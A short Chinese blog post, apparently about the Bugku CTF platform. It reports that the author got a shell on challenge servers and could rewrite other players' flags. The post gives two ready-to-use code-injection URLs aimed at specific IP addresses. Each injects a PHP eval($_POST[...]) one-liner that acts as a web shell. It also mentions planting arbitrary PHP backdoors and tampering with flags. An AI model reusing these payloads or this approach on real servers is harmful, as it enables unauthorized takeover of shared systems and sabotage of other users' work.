题目如下:
起因是得到了某题的flag后发现提交不正确,所以怀疑有人把flag给改了,然后自己试了下,成功getshell

如下链接可前台getshell

1
http://120.24.86.145:8003/?hello=);eval($_POST[a]);//

然后还可以任意改flag

过狗一句话

真的是送了一句话
直接连上去:
http://120.24.86.145:8010/?s=eval($_POST[drac]);

flag随便改,任意新建php后门

最后更新: 2018年08月10日 15:39

原始链接: http://drac0nids.top/2018/08/03/bugku某题搅屎/

× 请我吃糖~
打赏二维码